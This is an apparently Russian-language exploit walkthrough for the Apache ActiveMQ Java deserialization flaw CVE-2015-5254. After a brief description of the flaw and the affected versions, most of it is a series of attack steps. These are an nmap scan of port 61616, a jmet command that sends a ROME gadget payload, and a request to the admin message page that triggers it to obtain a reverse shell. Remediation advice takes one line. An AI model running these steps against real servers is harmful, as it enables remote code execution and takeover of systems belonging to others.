
ActiveMQ_CVE-2015-5254
ActiveMQ反序列化 (CVE-2015-5254)
Описание уязвимости: В Apache ActiveMQ версий 5.x до 5.13.0 существует уязвимость безопасности, вызванная тем, что программа не ограничивает классы, которые могут быть сериализованы в брокере. Удаленный злоумышленник может выполнить произвольный код с помощью специально созданного сериализованного объекта Java Message Service (JMS) ObjectMessage.
Затрагиваемые версии: Apache ActiveMQ 5.x до 5.13.0
0x01 Вход в панель управления для проверки версии: http://IP:8161

0x02 Определение открытого порта 61616:
nmap -sV -Pn -T4 -sC -p 61616 IP

0x03 Отправка реверсивного payload:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616

0x04 Щелкните, чтобы вызвать Browse event - Message ID, успешное получение реверс-шелла:
http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event

Рекомендации по исправлению: обновиться до последней версии, настроить правила WAF для блокировки.